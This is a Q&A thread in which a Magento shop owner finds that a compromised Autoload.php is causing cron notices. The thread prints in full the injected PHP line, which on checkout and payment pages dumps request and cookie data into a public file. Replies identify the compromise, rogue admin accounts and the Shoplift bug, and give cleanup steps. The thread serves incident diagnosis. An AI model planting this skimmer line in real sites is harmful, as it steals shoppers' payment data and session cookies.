5

Since this morning I'm getting the following PHP Notice after running the Magento cronjob:

Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1

I did not modify any of the mage files.. How is this possible?

EDIT: For now I've edited the Autoload.php to first check if the REQUEST_URI is set.

Original:

<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))

New:

<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))

EDIT 30-04-2015:

After reading @volkan and @b.enoit.be comments I've immediately replaced the specified page with the original one from Magento and the line was indeed not present!.

The following was the malicious line present in Autoload.php

<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>

I've also checked:

  • /js/index.php same as original
  • /index.php same as original
  • Magpleasure_Filesystem module was not present

However.. there were two new admin-users which had obscure names:

  • backup - auto_bc@magent.com <-- this domain leads to a domain holding page and the email gives Russian results on Google
  • database - db@local.host

Both users have been deleted. The website was also vulnerable tot the shoplift exploit (which is addressed in the latest security-patch)

We're currently busy installing the latest security patches.

It seems that this has been a recent problem:

100,000 web shops open to compromise as attackers exploit Magento bug Magento Shoplift Bug Tester v1.0

Thanks to all users for there help.

StavroX
  • 53
  • 1
  • 4
  • You didn't made change in the way you trigger the cronjob? Could PHP have been updated? No changes in the php.ini file? – adrien54 Apr 29 '15 at 09:35
  • Nope, neither. The server is running PHP (5.5.23-1) – StavroX Apr 29 '15 at 10:00
  • 1
    Then I don't know why the error didn't occur before, but the reason is probably that you are running your PHP script (cron.php) from the command line and not the browser, so this server variable is never defined. – adrien54 Apr 29 '15 at 10:09
  • That's what I've been trying to wrap my head around, it worked before and now all of a sudden it gives Undefined index. The cronjob is defined as: `*/5 * * * * php /var/www/website.com/cron.php` – StavroX Apr 29 '15 at 10:14
  • There is no such thing as `$_SERVER["REQUEST_URI"]` in lib/Varien/Autoload.php, though... maybe you did install some crappy module ? – β.εηοιτ.βε Apr 29 '15 at 21:03
  • I am also seeing an admin user with `auto_bc@magent.com` -- I'm not familiar with it, but a PM suggests it might be related to a Siteground backup module, are you using Siteground? – pspahn May 29 '15 at 18:47

2 Answers2

1

it looks like that your page has been compromised, replace the file with the original one, and install the security patches for magento. Check if there are some new admin-users in the backend, and for the module Magpleasure_Filesystem

check also /js/index.php /index.php

volkan
  • 26
  • 2
0

This is definitely a compromised file.

If anybody else encounters the same problem, media/catalog/product/cache_catalogs file should be deleted as well, because it contains sensitive data (requests and cookies data from checkout or payment pages) and it is publicly accessible (in media/ folder).

SeL
  • 1
  • 2